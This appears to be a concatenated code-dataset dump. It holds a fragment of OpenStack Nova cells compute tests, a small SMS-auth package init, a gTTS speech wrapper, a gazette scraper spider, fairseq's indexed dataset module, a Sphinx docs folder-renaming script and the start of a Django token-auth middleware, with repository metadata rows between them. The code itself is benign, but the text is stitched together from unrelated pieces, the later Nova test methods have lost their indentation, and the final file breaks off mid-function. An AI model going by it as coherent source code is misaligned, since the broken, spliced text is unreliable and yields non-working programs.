    @mock.patch.object(compute_api.API, '_checks_for_create_and_rebuild')
    def test_build_instances(self, _checks_for_create_and_rebuild,
                             _validate, _get_image, _check_bdm,
                             _provision, _record_action_start):
        # Verifies create() is hooked to schedule_and_build_instances.
        _get_image.return_value = (None, 'fake-image')
        _validate.return_value = ({}, 1, None, ['default'], None)
        _check_bdm.return_value = objects.BlockDeviceMappingList()
        _provision.return_value = []

        with mock.patch.object(self.compute_api.compute_task_api,
                               'schedule_and_build_instances') as sbi:
            self.compute_api.create(self.context, 'fake-flavor', 'fake-image')

            # Subsequent tests in class are verifying the hooking.  We
            # don't check args since this is verified in compute test
            # code.
            self.assertTrue(sbi.called)
    @mock.patch.object(compute_api.API, '_validate_flavor_image_nostatus')
    @mock.patch.object(objects.RequestSpec, 'get_by_instance_uuid')
    @mock.patch.object(compute_api.API, '_record_action_start')
    @mock.patch.object(compute_api.API, '_resize_cells_support')
    @mock.patch.object(compute_utils, 'upsize_quota_delta')
    @mock.patch.object(objects.Instance, 'save')
    @mock.patch.object(flavors, 'extract_flavor')
    @mock.patch.object(compute_api.API, '_check_auto_disk_config')
    @mock.patch.object(objects.BlockDeviceMappingList, 'get_by_instance_uuid')
    def test_resize_instance(self, _bdms, _check, _extract, _save, _upsize,
                             _cells, _record, _spec_get_by_uuid,
                             mock_validate):
        # Verifies resize() is redirected to the cells RPC API.
        flavor = objects.Flavor(**test_flavor.fake_flavor)
        _extract.return_value = flavor
        orig_system_metadata = {}
        instance = fake_instance.fake_instance_obj(self.context,
                vm_state=vm_states.ACTIVE, cell_name='fake-cell',
                launched_at=timeutils.utcnow(),
                system_metadata=orig_system_metadata,
                expected_attrs=['system_metadata'])
        instance.flavor = flavor
        instance.old_flavor = instance.new_flavor = None

        self.compute_api.resize(self.context, instance)
        self.assertTrue(self.cells_rpcapi.resize_instance.called)
@mock.patch.object(objects.ComputeNodeList, 'get_all_by_host')
@mock.patch.object(objects.RequestSpec, 'get_by_instance_uuid')
@mock.patch.object(compute_api.API, '_record_action_start')
@mock.patch.object(objects.Instance, 'save')
def test_live_migrate_instance(self, instance_save, _record, _get_spec,
mock_nodelist):
orig_system_metadata = {}
instance = fake_instance.fake_instance_obj(self.context,
vm_state=vm_states.ACTIVE, cell_name='fake-cell',
launched_at=timeutils.utcnow(),
system_metadata=orig_system_metadata,
expected_attrs=['system_metadata'])
self.compute_api.live_migrate(self.context, instance,
True, True, 'fake_dest_host')
self.assertTrue(self.cells_rpcapi.live_migrate_instance.called)
@mock.patch.object(objects.RequestSpec, 'get_by_instance_uuid')
@mock.patch.object(objects.Instance, 'save')
@mock.patch.object(objects.Instance, 'get_flavor')
@mock.patch.object(objects.BlockDeviceMappingList, 'get_by_instance_uuid')
@mock.patch.object(compute_api.API, '_get_image')
@mock.patch.object(compute_api.API, '_check_auto_disk_config')
@mock.patch.object(compute_api.API, '_checks_for_create_and_rebuild')
@mock.patch.object(compute_api.API, '_record_action_start')
def test_rebuild_instance(self, _record_action_start,
_checks_for_create_and_rebuild, _check_auto_disk_config,
_get_image, bdm_get_by_instance_uuid, get_flavor, instance_save,
_req_spec_get_by_inst_uuid):
orig_system_metadata = {}
instance = fake_instance.fake_instance_obj(self.context,
vm_state=vm_states.ACTIVE, cell_name='fake-cell',
launched_at=timeutils.utcnow(), image_ref=uuids.image_id,
system_metadata=orig_system_metadata,
expected_attrs=['system_metadata'])
get_flavor.return_value = {}
# The API request schema validates that a UUID is passed for the
# imageRef parameter so we need to provide an image.
image_href = uuids.image_id
image = {"min_ram": 10, "min_disk": 1,
"properties": {'architecture': 'x86_64'},
"id": uuids.image_id}
admin_pass = ''
files_to_inject = []
bdms = objects.BlockDeviceMappingList()
_get_image.return_value = (None, image)
bdm_get_by_instance_uuid.return_value = bdms
self.compute_api.rebuild(self.context, instance, image_href,
admin_pass, files_to_inject)
self.assertTrue(self.cells_rpcapi.rebuild_instance.called)
def test_check_equal(self):
task_api = self.compute_api.compute_task_api
tests = set()
for (name, value) in inspect.getmembers(self, inspect.ismethod):
if name.startswith('test_') and name != 'test_check_equal':
tests.add(name[5:])
if tests != set(task_api.cells_compatible):
self.fail("Testcases not equivalent to cells_compatible list")
| 44.046667 | 79 | 0.639534 |
1317f7e7b8f7b446f660a02247a2b29b878c80dc | 54 | py | Python | smsauth3/__init__.py | kwugfighter/sms-auth | 183d3f279fd94e69b0c486612853cd5f4621bf9d | [
"MIT"
] | null | null | null | smsauth3/__init__.py | kwugfighter/sms-auth | 183d3f279fd94e69b0c486612853cd5f4621bf9d | [
"MIT"
] | null | null | null | smsauth3/__init__.py | kwugfighter/sms-auth | 183d3f279fd94e69b0c486612853cd5f4621bf9d | [
"MIT"
] | null | null | null | from .main import SMSAuthorizer
__version__ = "0.1.2" | 18 | 31 | 0.759259 |
4f933f664fef5ed60828fd3ae9f6d33675db8532 | 449 | py | Python | gTTSwrapper.py | mytja/gTTS-wrapper | ed6452e1e870d913479252030ca343aa2a7742ca | [
"MIT"
] | 1 | 2020-08-26T17:08:30.000Z | 2020-08-26T17:08:30.000Z | gTTSwrapper.py | mytja/gTTS-wrapper | ed6452e1e870d913479252030ca343aa2a7742ca | [
"MIT"
] | null | null | null | gTTSwrapper.py | mytja/gTTS-wrapper | ed6452e1e870d913479252030ca343aa2a7742ca | [
"MIT"
] | null | null | null | # gTTS wrapper
import io
import pygame
from gtts import gTTS
# To play audio text-to-speech during execution
def say(my_text, language="en", slo=False):
    """Synthesize *my_text* with Google TTS and play it, blocking until done.

    Parameters:
        my_text: text to speak.
        language: gTTS language code (default ``"en"``).
        slo: if True, gTTS speaks slowly.
    """
    with io.BytesIO() as f:
        gTTS(text=my_text, lang=language, slow=slo).write_to_fp(f)
        f.seek(0)
        pygame.mixer.init()
        pygame.mixer.music.load(f)
        pygame.mixer.music.play()
        # Poll at ~10 Hz instead of spinning a tight `continue` loop,
        # which pinned one CPU core at 100% for the whole playback.
        while pygame.mixer.music.get_busy():
            pygame.time.wait(100)
| 24.944444 | 67 | 0.621381 |
4c92ce244030df317c3a30e338dd9e45f85fd368 | 192 | py | Python | data_collection/gazette/spiders/sc_chapeco.py | kaiocp/querido-diario | 86004049c6eee305e13066cf3607d30849bb099a | [
"MIT"
] | 454 | 2018-04-07T03:32:57.000Z | 2020-08-17T19:56:22.000Z | data_collection/gazette/spiders/sc_chapeco.py | kaiocp/querido-diario | 86004049c6eee305e13066cf3607d30849bb099a | [
"MIT"
] | 254 | 2020-08-18T14:09:43.000Z | 2022-03-28T11:30:51.000Z | data_collection/gazette/spiders/sc_chapeco.py | kaiocp/querido-diario | 86004049c6eee305e13066cf3607d30849bb099a | [
"MIT"
] | 183 | 2018-04-11T15:09:37.000Z | 2020-08-15T18:55:11.000Z | from gazette.spiders.base.fecam import FecamGazetteSpider
class ScChapecoSpider(FecamGazetteSpider):
    """Spider for the official gazette of Chapecó (SC) via the FECAM portal."""
    name = "sc_chapeco"
    # FECAM search filter selecting this municipality's entity.
    FECAM_QUERY = "cod_entidade:71"
    # NOTE(review): presumably the IBGE municipality code — confirm.
    TERRITORY_ID = "4204202"
| 24 | 57 | 0.765625 |
3efecab3a6eb6928d1eb2053c2a9118989b01b38 | 17,195 | py | Python | fairseq/data/indexed_dataset.py | Epsilon-Lee/fairseq-da | fbe7a39717afcb60dd4a3e1cd6abd3c763354fe1 | [
"MIT"
] | 35 | 2021-05-08T09:23:31.000Z | 2022-03-25T06:19:48.000Z | fairseq/data/indexed_dataset.py | Epsilon-Lee/fairseq-da | fbe7a39717afcb60dd4a3e1cd6abd3c763354fe1 | [
"MIT"
] | 4 | 2021-06-12T05:02:03.000Z | 2021-12-19T08:53:46.000Z | fairseq/data/indexed_dataset.py | Epsilon-Lee/fairseq-da | fbe7a39717afcb60dd4a3e1cd6abd3c763354fe1 | [
"MIT"
] | 4 | 2021-06-02T16:12:02.000Z | 2022-02-28T12:18:24.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import shutil
import struct
from functools import lru_cache
import numpy as np
import torch
from fairseq.data.fasta_dataset import FastaDataset
from fairseq.file_io import PathManager
from . import FairseqDataset
def __best_fitting_dtype(vocab_size=None):
    """Pick the smallest integer dtype able to hold token ids for *vocab_size*."""
    fits_in_uint16 = vocab_size is not None and vocab_size < 65500
    return np.uint16 if fits_in_uint16 else np.int32
def get_available_dataset_impl():
    """Return the list of dataset implementations this module supports."""
    return "raw lazy cached mmap fasta".split()
def infer_dataset_impl(path):
    """Guess the dataset implementation stored at *path*.

    Returns one of "raw", "cached", "mmap", "fasta", or None when the
    binary index magic is unrecognized or no dataset exists at *path*.
    """
    if IndexedRawTextDataset.exists(path):
        return "raw"
    elif IndexedDataset.exists(path):
        # Both "cached" and "mmap" share the .idx/.bin layout; the header
        # magic bytes distinguish the two formats.
        with open(index_file_path(path), "rb") as f:
            magic = f.read(8)
            if magic == IndexedDataset._HDR_MAGIC:
                return "cached"
            elif magic == MMapIndexedDataset.Index._HDR_MAGIC[:8]:
                return "mmap"
            else:
                return None
    elif FastaDataset.exists(path):
        return "fasta"
    else:
        return None
def make_builder(out_file, impl, vocab_size=None):
    """Create a dataset builder writing to *out_file* for implementation *impl*.

    For "mmap", *vocab_size* selects the narrowest integer dtype able to
    hold the token ids; "fasta" has no builder.
    """
    if impl == "mmap":
        return MMapIndexedDatasetBuilder(
            out_file, dtype=__best_fitting_dtype(vocab_size)
        )
    elif impl == "fasta":
        raise NotImplementedError
    else:
        return IndexedDatasetBuilder(out_file)
def make_dataset(path, impl, fix_lua_indexing=False, dictionary=None):
    """Open the dataset at *path* using implementation *impl*.

    Returns None when no dataset of that implementation exists.  "raw" and
    "fasta" require *dictionary* to encode text; *fix_lua_indexing* shifts
    stored 1-based (Lua) ids back to 0-based.
    """
    if impl == "raw" and IndexedRawTextDataset.exists(path):
        assert dictionary is not None
        return IndexedRawTextDataset(path, dictionary)
    elif impl == "lazy" and IndexedDataset.exists(path):
        return IndexedDataset(path, fix_lua_indexing=fix_lua_indexing)
    elif impl == "cached" and IndexedDataset.exists(path):
        return IndexedCachedDataset(path, fix_lua_indexing=fix_lua_indexing)
    elif impl == "mmap" and MMapIndexedDataset.exists(path):
        return MMapIndexedDataset(path)
    elif impl == "fasta" and FastaDataset.exists(path):
        # Imported lazily to avoid the fasta dependency unless needed.
        from fairseq.data.fasta_dataset import EncodedFastaDataset

        return EncodedFastaDataset(path, dictionary)
    return None
def dataset_exists(path, impl):
    """Return True if a dataset of implementation *impl* exists at *path*."""
    if impl == "raw":
        return IndexedRawTextDataset.exists(path)
    if impl == "mmap":
        return MMapIndexedDataset.exists(path)
    return IndexedDataset.exists(path)
def read_longs(f, n):
    """Read *n* little-endian int64 values from binary stream *f*."""
    values = np.empty(n, dtype=np.int64)
    f.readinto(values)
    return values
def write_longs(f, a):
    """Write the values of *a* to binary stream *f* as int64."""
    f.write(np.asarray(a, dtype=np.int64).tobytes())
# Mapping from on-disk type codes to numpy dtypes.  Code 6 historically used
# ``np.float`` (an alias of the builtin ``float``, i.e. float64), but that
# alias was removed in NumPy 1.24, which made this module fail at import
# time; ``np.float64`` preserves the same on-disk semantics.
dtypes = {
    1: np.uint8,
    2: np.int8,
    3: np.int16,
    4: np.int32,
    5: np.int64,
    6: np.float64,
    7: np.double,
    8: np.uint16,
}
def code(dtype):
    """Return the integer on-disk code for *dtype* (inverse of ``dtypes``)."""
    for type_code, candidate in dtypes.items():
        if candidate == dtype:
            return type_code
    raise ValueError(dtype)
def index_file_path(prefix_path):
    """Return the .idx (index) file path for *prefix_path*."""
    return "{}.idx".format(prefix_path)
def data_file_path(prefix_path):
    """Return the .bin (data) file path for *prefix_path*."""
    return "{}.bin".format(prefix_path)
class IndexedDataset(FairseqDataset):
    """Loader for TorchNet IndexedDataset (.idx index + .bin data files).

    Items are read lazily from disk on each ``__getitem__`` (modulo a small
    LRU cache); see ``IndexedCachedDataset`` for a prefetching variant.
    """

    _HDR_MAGIC = b"TNTIDX\x00\x00"

    def __init__(self, path, fix_lua_indexing=False):
        super().__init__()
        self.path = path
        # When True, stored 1-based (Lua) token ids are shifted to 0-based.
        self.fix_lua_indexing = fix_lua_indexing
        # Data file is opened lazily on first read (see read_data).
        self.data_file = None
        self.read_index(path)

    def read_index(self, path):
        """Parse the .idx header and offset tables."""
        with open(index_file_path(path), "rb") as f:
            magic = f.read(8)
            assert magic == self._HDR_MAGIC, (
                "Index file doesn't match expected format. "
                "Make sure that --dataset-impl is configured properly."
            )
            version = f.read(8)
            assert struct.unpack("<Q", version) == (1,)
            code, self.element_size = struct.unpack("<QQ", f.read(16))
            self.dtype = dtypes[code]
            # _len: number of items; s: total number of size entries.
            self._len, self.s = struct.unpack("<QQ", f.read(16))
            self.dim_offsets = read_longs(f, self._len + 1)
            self.data_offsets = read_longs(f, self._len + 1)
            self.sizes = read_longs(f, self.s)

    def read_data(self, path):
        # Unbuffered: reads are already sized exactly per item.
        self.data_file = open(data_file_path(path), "rb", buffering=0)

    def check_index(self, i):
        if i < 0 or i >= self._len:
            raise IndexError("index out of range")

    def __del__(self):
        if self.data_file:
            self.data_file.close()

    @lru_cache(maxsize=8)
    def __getitem__(self, i):
        if not self.data_file:
            self.read_data(self.path)
        self.check_index(i)
        tensor_size = self.sizes[self.dim_offsets[i] : self.dim_offsets[i + 1]]
        a = np.empty(tensor_size, dtype=self.dtype)
        # data_offsets are in elements, hence the element_size multiplier.
        self.data_file.seek(self.data_offsets[i] * self.element_size)
        self.data_file.readinto(a)
        item = torch.from_numpy(a).long()
        if self.fix_lua_indexing:
            item -= 1  # subtract 1 for 0-based indexing
        return item

    def __len__(self):
        return self._len

    def num_tokens(self, index):
        return self.sizes[index]

    def size(self, index):
        return self.sizes[index]

    @staticmethod
    def exists(path):
        return PathManager.exists(index_file_path(path)) and PathManager.exists(
            data_file_path(path)
        )

    @property
    def supports_prefetch(self):
        return False  # avoid prefetching to save memory
class IndexedCachedDataset(IndexedDataset):
    """IndexedDataset variant that prefetches requested items into one
    contiguous in-memory buffer; after prefetch, reads never touch disk."""

    def __init__(self, path, fix_lua_indexing=False):
        super().__init__(path, fix_lua_indexing=fix_lua_indexing)
        # Contiguous numpy buffer holding all prefetched items.
        self.cache = None
        # Maps item index -> start offset of that item inside self.cache.
        self.cache_index = {}

    @property
    def supports_prefetch(self):
        return True

    def prefetch(self, indices):
        """Load the given item indices from disk into the in-memory cache."""
        if all(i in self.cache_index for i in indices):
            return
        if not self.data_file:
            self.read_data(self.path)
        indices = sorted(set(indices))
        total_size = 0
        for i in indices:
            total_size += self.data_offsets[i + 1] - self.data_offsets[i]
        self.cache = np.empty(total_size, dtype=self.dtype)
        ptx = 0
        self.cache_index.clear()
        for i in indices:
            self.cache_index[i] = ptx
            size = self.data_offsets[i + 1] - self.data_offsets[i]
            # Read directly into the slice of the shared cache buffer.
            a = self.cache[ptx : ptx + size]
            self.data_file.seek(self.data_offsets[i] * self.element_size)
            self.data_file.readinto(a)
            ptx += size
        if self.data_file:
            # close and delete data file after prefetch so we can pickle
            self.data_file.close()
            self.data_file = None

    @lru_cache(maxsize=8)
    def __getitem__(self, i):
        # NOTE: only prefetched indices are present in cache_index; an
        # unprefetched index raises KeyError here.
        self.check_index(i)
        tensor_size = self.sizes[self.dim_offsets[i] : self.dim_offsets[i + 1]]
        a = np.empty(tensor_size, dtype=self.dtype)
        ptx = self.cache_index[i]
        np.copyto(a, self.cache[ptx : ptx + a.size])
        item = torch.from_numpy(a).long()
        if self.fix_lua_indexing:
            item -= 1  # subtract 1 for 0-based indexing
        return item
class IndexedRawTextDataset(FairseqDataset):
    """Takes a text file as input and binarizes it in memory at instantiation.
    Original lines are also kept in memory"""

    def __init__(self, path, dictionary, append_eos=True, reverse_order=False):
        # Encoded token tensors, one per input line.
        self.tokens_list = []
        # Raw text lines (without trailing newline), parallel to tokens_list.
        self.lines = []
        self.sizes = []
        self.append_eos = append_eos
        self.reverse_order = reverse_order
        self.read_data(path, dictionary)
        self.size = len(self.tokens_list)

    def read_data(self, path, dictionary):
        """Read *path* line by line and encode each line with *dictionary*."""
        with open(path, "r", encoding="utf-8") as f:
            for line in f:
                self.lines.append(line.strip("\n"))
                tokens = dictionary.encode_line(
                    line,
                    add_if_not_exist=False,
                    append_eos=self.append_eos,
                    reverse_order=self.reverse_order,
                ).long()
                self.tokens_list.append(tokens)
                self.sizes.append(len(tokens))
        self.sizes = np.array(self.sizes)

    def check_index(self, i):
        if i < 0 or i >= self.size:
            raise IndexError("index out of range")

    @lru_cache(maxsize=8)
    def __getitem__(self, i):
        self.check_index(i)
        return self.tokens_list[i]

    def get_original_text(self, i):
        """Return the raw (un-encoded) text of line *i*."""
        self.check_index(i)
        return self.lines[i]

    def __del__(self):
        pass

    def __len__(self):
        return self.size

    def num_tokens(self, index):
        return self.sizes[index]

    def size(self, index):
        return self.sizes[index]

    @staticmethod
    def exists(path):
        return PathManager.exists(path)
class IndexedDatasetBuilder(object):
    """Writes TorchNet-style indexed datasets (.bin data + .idx index)."""

    # Bytes per element for each supported dtype.  The historical
    # ``np.float: 4`` entry was doubly wrong: ``np.float`` aliased the
    # builtin ``float`` (i.e. float64, 8 bytes — so offsets computed from
    # a 4-byte element size were inconsistent with the bytes written), and
    # the alias was removed in NumPy 1.24, which made this class fail at
    # import time.  ``np.float64`` and ``np.double`` are the same dtype.
    element_sizes = {
        np.uint8: 1,
        np.int8: 1,
        np.int16: 2,
        np.int32: 4,
        np.int64: 8,
        np.float64: 8,
        np.double: 8,
    }

    def __init__(self, out_file, dtype=np.int32):
        self.out_file = open(out_file, "wb")
        self.dtype = dtype
        # Offsets are in elements (not bytes); index 0 is a sentinel.
        self.data_offsets = [0]
        self.dim_offsets = [0]
        self.sizes = []
        self.element_size = self.element_sizes[self.dtype]

    def add_item(self, tensor):
        """Append one tensor; values are shifted by +1 for Lua compatibility."""
        nbytes = self.out_file.write(np.array(tensor.numpy() + 1, dtype=self.dtype))
        self.data_offsets.append(self.data_offsets[-1] + nbytes / self.element_size)
        for dim in tensor.size():
            self.sizes.append(dim)
        self.dim_offsets.append(self.dim_offsets[-1] + len(tensor.size()))

    def merge_file_(self, another_file):
        """Append another dataset with the same dtype to this builder."""
        index = IndexedDataset(another_file)
        assert index.dtype == self.dtype
        begin = self.data_offsets[-1]
        for offset in index.data_offsets[1:]:
            self.data_offsets.append(begin + offset)
        self.sizes.extend(index.sizes)
        begin = self.dim_offsets[-1]
        for dim_offset in index.dim_offsets[1:]:
            self.dim_offsets.append(begin + dim_offset)
        # Stream the raw data; consistent with MMapIndexedDatasetBuilder
        # and simpler than the previous manual 1 KiB read loop.
        with open(data_file_path(another_file), "rb") as f:
            shutil.copyfileobj(f, self.out_file)

    def finalize(self, index_file):
        """Close the data file and write the .idx index file."""
        self.out_file.close()
        index = open(index_file, "wb")
        index.write(b"TNTIDX\x00\x00")
        index.write(struct.pack("<Q", 1))
        index.write(struct.pack("<QQ", code(self.dtype), self.element_size))
        index.write(struct.pack("<QQ", len(self.data_offsets) - 1, len(self.sizes)))
        write_longs(index, self.dim_offsets)
        write_longs(index, self.data_offsets)
        write_longs(index, self.sizes)
        index.close()
def _warmup_mmap_file(path):
    """Sequentially read *path* in 100 MiB chunks to warm the page cache."""
    chunk_size = 100 * 1024 * 1024
    with open(path, "rb") as handle:
        for _ in iter(lambda: handle.read(chunk_size), b""):
            pass
class MMapIndexedDataset(torch.utils.data.Dataset):
    """Memory-mapped indexed dataset: a .idx header/offsets file plus a flat
    .bin data file, both read zero-copy through numpy memmaps."""

    class Index(object):
        """Reader/writer for the .idx file (magic, version, dtype code,
        item count, per-item sizes, per-item byte pointers)."""

        _HDR_MAGIC = b"MMIDIDX\x00\x00"

        @classmethod
        def writer(cls, path, dtype):
            """Return a context manager that writes an index for *dtype*."""

            class _Writer(object):
                def __enter__(self):
                    self._file = open(path, "wb")
                    # Header: magic, version (1), dtype code.
                    self._file.write(cls._HDR_MAGIC)
                    self._file.write(struct.pack("<Q", 1))
                    self._file.write(struct.pack("<B", code(dtype)))
                    return self

                @staticmethod
                def _get_pointers(sizes):
                    # Byte offset of each item inside the .bin file.
                    dtype_size = dtype().itemsize
                    address = 0
                    pointers = []
                    for size in sizes:
                        pointers.append(address)
                        address += size * dtype_size
                    return pointers

                def write(self, sizes):
                    pointers = self._get_pointers(sizes)
                    self._file.write(struct.pack("<Q", len(sizes)))
                    # Sizes as int32, then pointers as int64, both C-order.
                    sizes = np.array(sizes, dtype=np.int32)
                    self._file.write(sizes.tobytes(order="C"))
                    del sizes
                    pointers = np.array(pointers, dtype=np.int64)
                    self._file.write(pointers.tobytes(order="C"))
                    del pointers

                def __exit__(self, exc_type, exc_val, exc_tb):
                    self._file.close()

            return _Writer()

        def __init__(self, path):
            with open(path, "rb") as stream:
                magic_test = stream.read(9)
                assert self._HDR_MAGIC == magic_test, (
                    "Index file doesn't match expected format. "
                    "Make sure that --dataset-impl is configured properly."
                )
                version = struct.unpack("<Q", stream.read(8))
                assert (1,) == version
                (dtype_code,) = struct.unpack("<B", stream.read(1))
                self._dtype = dtypes[dtype_code]
                self._dtype_size = self._dtype().itemsize
                self._len = struct.unpack("<Q", stream.read(8))[0]
                offset = stream.tell()
            _warmup_mmap_file(path)
            # Map the whole index file; tables are views into this buffer.
            self._bin_buffer_mmap = np.memmap(path, mode="r", order="C")
            self._bin_buffer = memoryview(self._bin_buffer_mmap)
            self._sizes = np.frombuffer(
                self._bin_buffer, dtype=np.int32, count=self._len, offset=offset
            )
            self._pointers = np.frombuffer(
                self._bin_buffer,
                dtype=np.int64,
                count=self._len,
                offset=offset + self._sizes.nbytes,
            )

        def __del__(self):
            self._bin_buffer_mmap._mmap.close()
            del self._bin_buffer_mmap

        @property
        def dtype(self):
            return self._dtype

        @property
        def sizes(self):
            return self._sizes

        @lru_cache(maxsize=8)
        def __getitem__(self, i):
            # (byte pointer, element count) of item i.
            return self._pointers[i], self._sizes[i]

        def __len__(self):
            return self._len

    def __init__(self, path):
        super().__init__()
        self._path = None
        self._index = None
        self._bin_buffer = None
        self._do_init(path)

    def __getstate__(self):
        # Pickle only the path; mmaps are re-created on unpickling.
        return self._path

    def __setstate__(self, state):
        self._do_init(state)

    def _do_init(self, path):
        self._path = path
        self._index = self.Index(index_file_path(self._path))
        _warmup_mmap_file(data_file_path(self._path))
        self._bin_buffer_mmap = np.memmap(
            data_file_path(self._path), mode="r", order="C"
        )
        self._bin_buffer = memoryview(self._bin_buffer_mmap)

    def __del__(self):
        self._bin_buffer_mmap._mmap.close()
        del self._bin_buffer_mmap
        del self._index

    def __len__(self):
        return len(self._index)

    @lru_cache(maxsize=8)
    def __getitem__(self, i):
        ptr, size = self._index[i]
        np_array = np.frombuffer(
            self._bin_buffer, dtype=self._index.dtype, count=size, offset=ptr
        )
        # Tokens are consumed as int64; upcast narrower on-disk dtypes.
        if self._index.dtype != np.int64:
            np_array = np_array.astype(np.int64)
        return torch.from_numpy(np_array)

    @property
    def sizes(self):
        return self._index.sizes

    @property
    def supports_prefetch(self):
        # The OS page cache already serves mmap reads; nothing to prefetch.
        return False

    @staticmethod
    def exists(path):
        return PathManager.exists(index_file_path(path)) and PathManager.exists(
            data_file_path(path)
        )
def get_indexed_dataset_to_local(path):
    """Fetch both the .idx and .bin files to local storage (via PathManager)
    and return the shared local path prefix (without extension)."""
    local_index_path = PathManager.get_local_path(index_file_path(path))
    local_data_path = PathManager.get_local_path(data_file_path(path))

    assert local_index_path.endswith(".idx") and local_data_path.endswith(".bin"), (
        "PathManager.get_local_path does not return files with expected patterns: "
        f"{local_index_path} and {local_data_path}"
    )

    local_path = local_data_path[:-4]  # stripping suffix ".bin"
    assert local_path == local_index_path[:-4]  # stripping suffix ".idx"
    return local_path
class MMapIndexedDatasetBuilder(object):
    """Builder for MMapIndexedDataset: streams item data to a .bin file and
    writes the .idx index on finalize()."""

    def __init__(self, out_file, dtype=np.int64):
        self._data_file = open(out_file, "wb")
        self._dtype = dtype
        # Element count of each appended item, in order.
        self._sizes = []

    def add_item(self, tensor):
        # Values are written as-is (no +1 Lua shift, unlike
        # IndexedDatasetBuilder).
        np_array = np.array(tensor.numpy(), dtype=self._dtype)
        self._data_file.write(np_array.tobytes(order="C"))
        self._sizes.append(np_array.size)

    def merge_file_(self, another_file):
        """Append another mmap dataset with the same dtype to this builder."""
        # Concatenate index
        index = MMapIndexedDataset.Index(index_file_path(another_file))
        assert index.dtype == self._dtype

        for size in index.sizes:
            self._sizes.append(size)

        # Concatenate data
        with open(data_file_path(another_file), "rb") as f:
            shutil.copyfileobj(f, self._data_file)

    def finalize(self, index_file):
        """Close the data file and write the index for all appended items."""
        self._data_file.close()

        with MMapIndexedDataset.Index.writer(index_file, self._dtype) as index:
            index.write(self._sizes)
| 30.596085 | 84 | 0.594999 |
d65b8a350eed18deb03b4da4a00e2ca7b9c3efb8 | 2,700 | py | Python | tools/doc/rename_folders.py | mszhanyi/onnxruntime | 6f85d3e5c81c919022ac4a77e5a051da8518b15d | [
"MIT"
] | 669 | 2018-12-03T22:00:31.000Z | 2019-05-06T19:42:49.000Z | tools/doc/rename_folders.py | mszhanyi/onnxruntime | 6f85d3e5c81c919022ac4a77e5a051da8518b15d | [
"MIT"
] | 440 | 2018-12-03T21:09:56.000Z | 2019-05-06T20:47:23.000Z | tools/doc/rename_folders.py | mszhanyi/onnxruntime | 6f85d3e5c81c919022ac4a77e5a051da8518b15d | [
"MIT"
] | 140 | 2018-12-03T21:15:28.000Z | 2019-05-06T18:02:36.000Z | """
Github publishes the markdown documentation with jekyll enabled.
This extension does not publish any folder starting with `_`.
These folders need to be renamed.
"""
import os
import re
def rename_folder(root):
    """
    Rename every folder under *root* whose name starts with ``_``.

    Jekyll (used by GitHub Pages) ignores folders starting with an
    underscore, so Sphinx output folders such as ``_static`` must be
    renamed before publishing.

    Returns the renames as a list of ``(parent, old_name, new_name)`` tuples.
    """
    # Walk bottom-up so a nested underscore folder is renamed before its
    # parent; walking top-down, renaming the parent first invalidated the
    # recorded path of the child and os.rename then failed.
    found = []
    for parent, dirs, _files in os.walk(root, topdown=False):
        for name in dirs:
            if name.startswith("_"):
                found.append((parent, name))
    renamed = []
    for parent, name in found:
        into = name.lstrip("_")
        renamed.append((parent, name, into))
        full_src = os.path.join(parent, name)
        full_into = os.path.join(parent, into)
        if os.path.exists(full_into):
            # The %-argument was missing in the original message, so the
            # error never showed which folder actually collided.
            raise RuntimeError(
                "%r already exists, previous documentation should be removed."
                % full_into
            )
        print("rename %r" % full_src)
        os.rename(full_src, full_into)
    return renamed
def replace_files(root, renamed):
    """Rewrite quoted URLs in every .html file under *root* so that links
    pointing at the old underscore folder names use the renamed folders.

    *renamed* is the list of ``(parent, old_name, new_name)`` tuples
    returned by ``rename_folder``.
    """
    subs = {r[1]: r[2] for r in renamed}
    # Matches a double-quoted URL-like string with a 2-6 letter extension,
    # e.g. "static/style.css" or "_images/plot.png?v=1".
    reg = re.compile('(\\"[a-zA-Z0-9\\.\\/\\?\\:@\\-_=#]+\\.([a-zA-Z]){2,6}' '([a-zA-Z0-9\\.\\&\\/\\?\\:@\\-_=#])*\\")')
    for r, dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[-1] != ".html":
                continue
            full = os.path.join(r, name)
            with open(full, "r", encoding="utf-8") as f:
                content = f.read()
            find = reg.findall(content)
            repl = []
            for f in find:
                # Absolute http(s) links are left untouched.
                if f[0].startswith("http"):
                    continue
                for k, v in subs.items():
                    if k == v:
                        raise ValueError("%r == %r" % (k, v))
                    # Replace the old folder name when it appears at the
                    # start of the quoted path or after a path separator.
                    if ('"%s' % k) in f[0]:
                        repl.append((f[0], f[0].replace('"%s' % k, '"%s' % v)))
                    if ("/%s" % k) in f[0]:
                        repl.append((f[0], f[0].replace("/%s" % k, "/%s" % v)))
            if len(repl) == 0:
                continue
            print("update %r" % full)
            for k, v in repl:
                content = content.replace(k, v)
            with open(full, "w", encoding="utf-8") as f:
                f.write(content)
if __name__ == "__main__":
    import sys

    # Root of the built HTML docs; can be overridden on the command line.
    if len(sys.argv) > 1:
        root = sys.argv[-1]
    else:
        root = "../../build/docs/html"
    print("look into %r" % root)
    ren = rename_folder(root)
    if len(ren) == 0:
        # Nothing was renamed (e.g. a previous run already did it); still
        # rewrite links for the usual Sphinx output folders.
        ren = [
            ("", "_static", "static"),
            ("", "_images", "images"),
            ("", "_downloads", "downloads"),
            ("", "_sources", "sources"),
            ("", "_modules", "modules"),
        ]
    replace_files(root, ren)
    print("done.")
| 31.764706 | 120 | 0.47037 |
7bf451ec8380449c011f8f4e9633427887dc3501 | 1,035 | py | Python | kollect/middleware/auth.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | null | null | null | kollect/middleware/auth.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | null | null | null | kollect/middleware/auth.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | null | null | null | from django.contrib.auth.models import AnonymousUser
from django.utils.functional import SimpleLazyObject
from kollect.models import User
from kollect.utils.auth import parse_token, security_hash
def get_user(header):
    """Resolve a ``User`` from an ``Authorization: Token <jwt>`` header value.

    Returns ``AnonymousUser`` when the header is malformed, the token does
    not parse, the referenced user does not exist, or the token's security
    hash is stale (e.g. minted before a credential change).
    """
    if not header.startswith("Token "):
        return AnonymousUser()
    token = header.split(" ", 1)[1]
    payload = parse_token(token)
    if not payload:
        return AnonymousUser()
    try:
        user = User.objects.get(id=payload["uid"])
